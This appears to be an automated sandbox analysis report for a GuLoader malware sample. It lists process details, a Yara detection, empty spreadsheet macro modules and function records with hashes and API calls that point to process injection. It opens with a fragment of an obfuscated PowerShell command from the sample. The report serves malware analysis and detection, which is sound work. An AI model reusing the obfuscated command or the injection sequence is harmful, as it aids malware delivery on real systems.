'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
Imagebase:	0x1290000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000019.00000002.967882170.0000000007895000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Analysis Process: cmd.exePID: 1984, Parent PID: 680

General

Target ID:	26
Start time:	07:03:19
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Imagebase:	0x4a0e0000
File size:	302'592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

Code Analysis

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: powershell.exePID: 3588, Parent PID: 3544COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.4%
Total number of Nodes:	23
Total number of Limit Nodes:	2

Executed Functions

Function 00419689 Relevance: 1.9, Strings: 1, Instructions: 658
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8@, xrefs: 004197D7

Memory Dump Source

Source File: 0000000C.00000002.453553606.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_410000_powershell.jbxd

Similarity

API ID:
String ID: 8@
API String ID: 0-1493877792
Opcode ID: 18f49ce96ff9048252d6c710ed5728f28bc6090deede8fb72c492269a3087fc7
Instruction ID: 0b030f9026611050b7bf4633e1524a8a1eaffdb2fdef6adc57a738830c35bf23
Opcode Fuzzy Hash: 18f49ce96ff9048252d6c710ed5728f28bc6090deede8fb72c492269a3087fc7
Instruction Fuzzy Hash: A962F274E002298FDB68DF69C894BDDBBB2AF89301F5484EAD409A7250DB345EC6CF54

Function 00814988 Relevance: 28.3, Strings: 21, Instructions: 2036COMMON

Download Yara Rule

Strings

4'p, xrefs: 00814C5A
L4p, xrefs: 008155B1
(op, xrefs: 0081537E
4'p, xrefs: 00814A96
(op, xrefs: 0081538E
4'p, xrefs: 00814E26
$p, xrefs: 00814C37
$p, xrefs: 008149DF
4'p, xrefs: 008151BB
4'p, xrefs: 00814AA2
$p, xrefs: 00814C1B
L4p, xrefs: 008155A6
$p, xrefs: 00814A44
$p, xrefs: 00814C43
4'p, xrefs: 00814E1A
L4p, xrefs: 00815548
4'p, xrefs: 00814FE8
4'p, xrefs: 00814FF4
4'p, xrefs: 008151AF
4'p, xrefs: 00814C66
$p, xrefs: 00814A38

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: (op$(op$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$L4p$L4p$L4p$$p$$p$$p$$p$$p$$p
API String ID: 0-940907646
Opcode ID: d67cf70b9567955d864de2d0f0a16f423fe81ffebee386ad5c1f7e2f9c3ca254
Instruction ID: debe5be05de412bc70662e6e2175118d79a2fabc4387041c71772651e1abc31b
Opcode Fuzzy Hash: d67cf70b9567955d864de2d0f0a16f423fe81ffebee386ad5c1f7e2f9c3ca254
Instruction Fuzzy Hash: 6172E131B04205DFCB299F68C455BEABBAAFFC5311F28806AD815CB251DB71CD82CB91

Function 00811420 Relevance: 22.9, Strings: 18, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h%f, xrefs: 008115D9
4'p, xrefs: 0081154F
9F, xrefs: 008114F6
4'p, xrefs: 00811543
8#f, xrefs: 00811885
$p, xrefs: 008117AA
8#f, xrefs: 00811877
9F, xrefs: 008114D3
$p, xrefs: 008117B6
8#f, xrefs: 00811676
8#f, xrefs: 008116B9
$p, xrefs: 0081178E
$p, xrefs: 00811639
4:F, xrefs: 00811818
h%f, xrefs: 008115CB
8#f, xrefs: 00811680
8#f, xrefs: 008116C3
4:F, xrefs: 008117FB

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$4:F$4:F$8#f$8#f$8#f$8#f$8#f$8#f$h%f$h%f$$p$$p$$p$$p$9F$9F
API String ID: 0-2457164321
Opcode ID: 669c27a10bcf8eceda80b4865795cbce53a6c8b665809dbb4c366a2efc4e2eef
Instruction ID: b139547edf30c7a7476fbb9bbf2c0bfe7f95692d4655bab31e0c00e696ce211c
Opcode Fuzzy Hash: 669c27a10bcf8eceda80b4865795cbce53a6c8b665809dbb4c366a2efc4e2eef
Instruction Fuzzy Hash: 64D1E335B042058FDF148F68D444AAABBEAFFD5314F28C46ADA45CB255DB32CD82C792

Function 00813A08 Relevance: 16.9, Strings: 13, Instructions: 615COMMON

Download Yara Rule

Strings

4'p, xrefs: 00813E9F
4'p, xrefs: 00813B2C
h%f, xrefs: 00813D89
4'p, xrefs: 00813B20
$p, xrefs: 00814073
4'p, xrefs: 00813FD2
$p, xrefs: 0081409B
4'p, xrefs: 008140E1
h%f, xrefs: 00813D97
$p, xrefs: 0081408F
4'p, xrefs: 00813EAB
4'p, xrefs: 008140D5
4'p, xrefs: 00813FC6

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$h%f$h%f$$p$$p$$p
API String ID: 0-2272611494
Opcode ID: f43aea6ffd362c0d80215f14b7670785dfcc2b4f01029d7cd7cfc3a854686deb
Instruction ID: f5dee2eb16cfddf71f2bdc74c897f9096736e8608527c1d40079449f577dfb9d
Opcode Fuzzy Hash: f43aea6ffd362c0d80215f14b7670785dfcc2b4f01029d7cd7cfc3a854686deb
Instruction Fuzzy Hash: C822F431B043159FCB159B68D8107AABBF6FFC5310F2880AAD545DB292DB71CE85C7A2

Function 00419200 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004194C7

Strings

8@, xrefs: 0041960F
8@, xrefs: 0041954A
8@, xrefs: 0041941A

Memory Dump Source

Source File: 0000000C.00000002.453553606.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_410000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID: 8@$8@$8@
API String ID: 963392458-2791133590
Opcode ID: adc75deed3ad3927b6fb3ca8572a0d6ae83b456d310ea840c0c5507de2ff4349
Instruction ID: ae514e98971c6015112cd11bb47797d9dbdd9b9b1facc8130cbe14dab4041092
Opcode Fuzzy Hash: adc75deed3ad3927b6fb3ca8572a0d6ae83b456d310ea840c0c5507de2ff4349
Instruction Fuzzy Hash: D3C12671D002199FDF25CFA8C951BEEBBB1BB09304F0095AAD819B7290DB749E85CF94

Function 008143E8 Relevance: 6.6, Strings: 5, Instructions: 383
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 0081452F
$p, xrefs: 00814508
4'p, xrefs: 00814523
$p, xrefs: 008144FC
$p, xrefs: 008144A6

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$$p$$p$$p
API String ID: 0-2334450948
Opcode ID: 0b1e09a370ccdc24ffe75e860ed8ed904486e1b712400c856ca2f0c2ed58d16d
Instruction ID: 6f790426537014ee8634a863e6f54acac6efd75c6ec0db2172d2666442cd7f82
Opcode Fuzzy Hash: 0b1e09a370ccdc24ffe75e860ed8ed904486e1b712400c856ca2f0c2ed58d16d
Instruction Fuzzy Hash: 1CC125357043459FDB259B789410BEABBEAFFC6314F28906BD449CB292DA71CC81C762

Function 008143CC Relevance: 3.9, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 00814523
$p, xrefs: 008144FC
$p, xrefs: 008144A6

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$$p$$p
API String ID: 0-2931952147
Opcode ID: 43dfc90d669ff3d29c4f453f4a8b4dd2020d469854f585f5f689f38d926ed7fe
Instruction ID: 7da9888d2cc45eef02073b6937ee9a554fee6c41f94af5ec80e37d7aa32d04bd
Opcode Fuzzy Hash: 43dfc90d669ff3d29c4f453f4a8b4dd2020d469854f585f5f689f38d926ed7fe
Instruction Fuzzy Hash: AF31F2706053059FDF218A28D4117EA7BBAFF85314F25A076D849DB1A2D734CCC1CB66

Function 00811628 Relevance: 3.8, Strings: 3, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8#f, xrefs: 00811676
8#f, xrefs: 008116B9
$p, xrefs: 00811639

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 8#f$8#f$$p
API String ID: 0-3303518646
Opcode ID: c8a201f8a44e25ce22ad33e577a93610102ae6804fca487a629cd5d474b63ea7
Instruction ID: 84825f31e67bc6395b063098a5e5a62ea49776d3c6aa0a68e78acafefce38da5
Opcode Fuzzy Hash: c8a201f8a44e25ce22ad33e577a93610102ae6804fca487a629cd5d474b63ea7
Instruction Fuzzy Hash: 7C1181342002159FDF14CA49C889EA6B79EFFA4314F1CC069A918CB355CB32DD81CB91

Function 00418E68 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00418F3B

Memory Dump Source

Source File: 0000000C.00000002.453553606.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_410000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 24ca40f942eaab90f06fcd77bc5419c80d2047382580155f337ab2917b69566c
Instruction ID: af690221205ce6576ccb08c75f9dccd2192ce7b449515d0c37c9d5b106a0762c
Opcode Fuzzy Hash: 24ca40f942eaab90f06fcd77bc5419c80d2047382580155f337ab2917b69566c
Instruction Fuzzy Hash: D1419BB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D739AA45CF64

Function 00418B20 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00418BCF

Memory Dump Source

Source File: 0000000C.00000002.453553606.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_410000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4067a9e5064e4d3c9e273e9d43743303c04f9c0b38244511b9d368a89e05a6e7
Instruction ID: 20e4db4368ac27f4c7c109b2e81f60f305dc5435181e4d98e156e4c0c3fd9d0d
Opcode Fuzzy Hash: 4067a9e5064e4d3c9e273e9d43743303c04f9c0b38244511b9d368a89e05a6e7
Instruction Fuzzy Hash: 4D41ACB4D002589FCB10CFA9D984AEEFBF1AB49314F24842AE414B7240D739A989CF64

Function 00418A28 Relevance: 1.6, APIs: 1, Instructions: 79
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00418AAE

Memory Dump Source

Source File: 0000000C.00000002.453553606.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_410000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7b6b6c013f2df8fc6dc4186c174b0065a9dc3fea05ad0ff8b9ec6c1199d73df6
Instruction ID: 4dfc4003a377cb1a619f248320a168141781ebfdf002aa0c985741c8ad83a526
Opcode Fuzzy Hash: 7b6b6c013f2df8fc6dc4186c174b0065a9dc3fea05ad0ff8b9ec6c1199d73df6
Instruction Fuzzy Hash: 1D31DCB4D002589FCF10CFA9D984AEEFBB1AF49314F24842AE815B7350C735A946CF98

Function 00418A30 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00418AAE

Memory Dump Source

Source File: 0000000C.00000002.453553606.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_410000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 13c03dadfd7b0a680d835229a9dce17b8acb747eaeebb27a7281ec3c243cd4ce
Instruction ID: 3c90592407584cf9390aeeb38fb008391cad681f4d87d2122a8436d71b9cec0d
Opcode Fuzzy Hash: 13c03dadfd7b0a680d835229a9dce17b8acb747eaeebb27a7281ec3c243cd4ce
Instruction Fuzzy Hash: AC31CDB4D002189FCF14CFA9D984AEEFBB5AF49314F14942AE815B7310C735A945CF98

Function 0081528C Relevance: 1.3, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(op, xrefs: 0081537E

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: (op
API String ID: 0-3117038
Opcode ID: f3cfe42af3c2d9109fe082ac1b7d9e5011fd48f58440ab8008d0638d1307997f
Instruction ID: 45b64b60aad8638723ecdb11b791559f863f11d25809a4429288f1420d5c51fd
Opcode Fuzzy Hash: f3cfe42af3c2d9109fe082ac1b7d9e5011fd48f58440ab8008d0638d1307997f
Instruction Fuzzy Hash: 16319170A00A09DFDF24CE15C845BEABBA5FFC1356F248065E415CB291D3B4D8C1CB45

Function 00815298 Relevance: 1.3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(op, xrefs: 0081537E

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: (op
API String ID: 0-3117038
Opcode ID: 6dda08686992a7c0df9cdf211f68d94ff4b7af9db62c838c51f1d6cab7adcf0f
Instruction ID: 5e4452fde52c40f3d654ed72439eea707c4c82c8765711b753be35d0566b8f85
Opcode Fuzzy Hash: 6dda08686992a7c0df9cdf211f68d94ff4b7af9db62c838c51f1d6cab7adcf0f
Instruction Fuzzy Hash: 91315C70A00A09DFDF24CE19C845BEABBA9FFC1356F248065E419CB291D7B4D8C1CB95

Function 00814D40 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

4'p, xrefs: 00814E1A

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: c59e7a2188642fc33aebf620d8378f7148e5b1f9216cc9cd6e768a1714ded8c9
Instruction ID: be67b684eef0f217fcee550fb06aa0321e9d8ebb3f30bd17355a9ce67b29b238
Opcode Fuzzy Hash: c59e7a2188642fc33aebf620d8378f7148e5b1f9216cc9cd6e768a1714ded8c9
Instruction Fuzzy Hash: CD217F30A0020ADFCF24DE69D555BA9BBEAFF84365F58906AD408CB254D771CCC1CB91

Function 00813DE8 Relevance: 1.3, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 00813E9F

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: efeec5b96804c26917d9e489b5873bb6704bb7bc83d8cec80fec41f1f6e179b7
Instruction ID: 042f74abb33cc7de8eca954201de0d820083dbf16bcffeb55de9cb4405247884
Opcode Fuzzy Hash: efeec5b96804c26917d9e489b5873bb6704bb7bc83d8cec80fec41f1f6e179b7
Instruction Fuzzy Hash: A6116A31A00308DFCB54DE29C4417EABBF9FF84350F248066A408D7665DB75DAC5CB91

Function 0012D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.453213523.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_12d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b36fb38777ac3fcf7d7d79279270e1ca53cf51fa4c6f23d0706fa4a80984c0
Instruction ID: afee1b6f1f4911fb24acca5a151bb91affabc7866efdb6fb7bcb3538cfcd4859
Opcode Fuzzy Hash: f8b36fb38777ac3fcf7d7d79279270e1ca53cf51fa4c6f23d0706fa4a80984c0
Instruction Fuzzy Hash: E6018C6140D3D09FD7124B25EC94762BFA4DF43624F1984DBE8848F2A7C2689C49C772

Function 0012D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.453213523.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_12d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3c8b9fab4d211a77c01aac29d3efc7967eaaf5d67d77fca9e19e4b5fbdfda3
Instruction ID: bb9a54b9d6d19c8b5087f75d619e322239d17f1de84d08d154e9303af83b6d10
Opcode Fuzzy Hash: 6b3c8b9fab4d211a77c01aac29d3efc7967eaaf5d67d77fca9e19e4b5fbdfda3
Instruction Fuzzy Hash: C301D471504350AEE7104E26E884B66BF98DF41724F28C41AFC444A2A6C779D845C6B5

Function 008111B0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e6bf8d4265d05cca7da05538b30fa0ceb41fa61b57024a54be56732329f3ad
Instruction ID: 8b30f2d7dd086de6dbda904e29ef93660350a37e96b6d8ed7bf63cbd9762f95f
Opcode Fuzzy Hash: 14e6bf8d4265d05cca7da05538b30fa0ceb41fa61b57024a54be56732329f3ad
Instruction Fuzzy Hash: 1FF0F47074030837C72016658815B6F29AA9F88700F508419F505DF3C1D9B69C81436A

Non-executed Functions

Function 008100A0 Relevance: 16.7, Strings: 13, Instructions: 419COMMON

Download Yara Rule

Strings

`8F, xrefs: 00810189
`8F, xrefs: 00810240
L4p, xrefs: 008101C9
L4p, xrefs: 00810419
L4p, xrefs: 008103B0
L4p, xrefs: 00810160
L4p, xrefs: 0081040E
4'p, xrefs: 0081058B
`8F, xrefs: 0081011B
$p, xrefs: 0081056A
$p, xrefs: 00810576
4'p, xrefs: 00810597
L4p, xrefs: 008101BE

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$`8F$`8F$`8F$$p$$p
API String ID: 0-1271114570
Opcode ID: 332c75bcda489f761e130dc3283b31c07957d414a940a3396893774ce6f8f9ff
Instruction ID: 7b0fefaa4e2193bf42b6b632f18d0d2a0cbd600668c71ab583576cbb64cf42df
Opcode Fuzzy Hash: 332c75bcda489f761e130dc3283b31c07957d414a940a3396893774ce6f8f9ff
Instruction Fuzzy Hash: 5CE11731B002049FDB159E68DC50BEE7BAAFF84314F188066E951DB291CBB0DDC1CBA2

Function 00813358 Relevance: 10.3, Strings: 8, Instructions: 342COMMON

Download Yara Rule

Strings

4'p, xrefs: 008136ED
4'p, xrefs: 00813518
tPp, xrefs: 008134A4
h%f, xrefs: 0081376A
h%f, xrefs: 00813778
tPp, xrefs: 00813498
4'p, xrefs: 008136E1
4'p, xrefs: 00813524

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$4'p$4'p$h%f$h%f$tPp$tPp
API String ID: 0-4109331202
Opcode ID: fac893459c972d74d4171dd607f7369d41ff73060fcf78684528743b4a935a7c
Instruction ID: e65fb7749cf1971c4b4dfce7b43ed32f8ed875384ba29cbee7d0c8c931ac08a4
Opcode Fuzzy Hash: fac893459c972d74d4171dd607f7369d41ff73060fcf78684528743b4a935a7c
Instruction Fuzzy Hash: 8FC1E170B002059FCB259A68D411BEA7BAAFF84714F2480BAD545CB391DB71DEC1CBA2

Function 00811B58 Relevance: 10.2, Strings: 8, Instructions: 190COMMON

Download Yara Rule

Strings

$p, xrefs: 00811C11
[f, xrefs: 00811D64
$p, xrefs: 00811BAF
$p, xrefs: 00811BE7
$p, xrefs: 00811C05
$p, xrefs: 00811BCB
$p, xrefs: 00811BF3
[f, xrefs: 00811D72

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p$[f$[f
API String ID: 0-3794282934
Opcode ID: 6d9262c6494a8885878e12b4233f989d6352d17bcb89718d0778d192b529be46
Instruction ID: 52c0a8203640701ba31fb88f6fd021b21a65b740324d2eefc8068c43e1405b13
Opcode Fuzzy Hash: 6d9262c6494a8885878e12b4233f989d6352d17bcb89718d0778d192b529be46
Instruction Fuzzy Hash: 0F510236B083158FCF258A6994056BAFBEAFFD1310F28806BD655C7251DA31CC81C7A1

Function 00810968 Relevance: 8.9, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

tPp, xrefs: 00810A22
[f, xrefs: 00810A6C
(sA, xrefs: 00810A37
8#f, xrefs: 00810B4A
8#f, xrefs: 00810B58
tPp, xrefs: 00810A16
[f, xrefs: 00810A5E

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: (sA$8#f$8#f$tPp$tPp$[f$[f
API String ID: 0-1064802373
Opcode ID: 962d9cd335f18d4f94a25d3f92cdd4db3b9f2e6ac9d77354e56f8ee683f46cfc
Instruction ID: a49e8f70bcb5372a77361f908a1a305ecd4cdd02daccfeb521de67a0b081cc8d
Opcode Fuzzy Hash: 962d9cd335f18d4f94a25d3f92cdd4db3b9f2e6ac9d77354e56f8ee683f46cfc
Instruction Fuzzy Hash: F8512B317043149FD7249A69DC54BAABBAAFFC1314F28C02AE545CB391DAB1DCC1CB51

Function 008105C8 Relevance: 7.7, Strings: 6, Instructions: 235COMMON

Download Yara Rule

Strings

4'p, xrefs: 008108B2
\9F, xrefs: 00810820
4'p, xrefs: 008108A6
L4p, xrefs: 008106E6
L4p, xrefs: 008106F1
L4p, xrefs: 00810688

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$L4p$L4p$L4p$\9F
API String ID: 0-4137195194
Opcode ID: f0dfe3e15a85a09dfe2f0fce77e4c123f27b2264f4581851ff54590a90b992a1
Instruction ID: 4532256649748923cdcd61f9daf8d9f39f6fca3b2c017ee57225a7827da4fe6c
Opcode Fuzzy Hash: f0dfe3e15a85a09dfe2f0fce77e4c123f27b2264f4581851ff54590a90b992a1
Instruction Fuzzy Hash: CC710370B003489FDB159E68D850BEE7BAAFF85310F14846AE941CB291DAB1DDC1CF92

Function 0081000A Relevance: 7.6, Strings: 6, Instructions: 147COMMON

Download Yara Rule

Strings

L4p, xrefs: 008101C9
L4p, xrefs: 00810160
`8F, xrefs: 00810189
`8F, xrefs: 0081011B
L4p, xrefs: 008101BE
<, xrefs: 0081004A

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: <$L4p$L4p$L4p$`8F$`8F
API String ID: 0-2122488464
Opcode ID: a6cdf9512cf36a06410c7f17a39326c0d7338d3529efe52ea1b53463d5c0d1ef
Instruction ID: 21a7dbe48e82417d98f7f103740c641e295e42f8a93afb9c38553375916cbe4f
Opcode Fuzzy Hash: a6cdf9512cf36a06410c7f17a39326c0d7338d3529efe52ea1b53463d5c0d1ef
Instruction Fuzzy Hash: F0519171A04388AFDB168B24C8147A97BB6FF46314F1980A6D890DB1A3C7B4DCC4CF62

Function 00811EC8 Relevance: 6.4, Strings: 5, Instructions: 196COMMON

Download Yara Rule

Strings

$p, xrefs: 00811F3F
h%f, xrefs: 00811FC4
h%f, xrefs: 00811FB6
$p, xrefs: 00811F1B
$p, xrefs: 00811F4B

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: h%f$h%f$$p$$p$$p
API String ID: 0-930881452
Opcode ID: 04c9c9949d7d2976db56fe108f237a24e1929bf40c1b404ead90f2e5711d6258
Instruction ID: a2b4874a2f1fca4ff7adc899e75d5478d64dee7e8ebc4e5f35a9edf7560f393c
Opcode Fuzzy Hash: 04c9c9949d7d2976db56fe108f237a24e1929bf40c1b404ead90f2e5711d6258
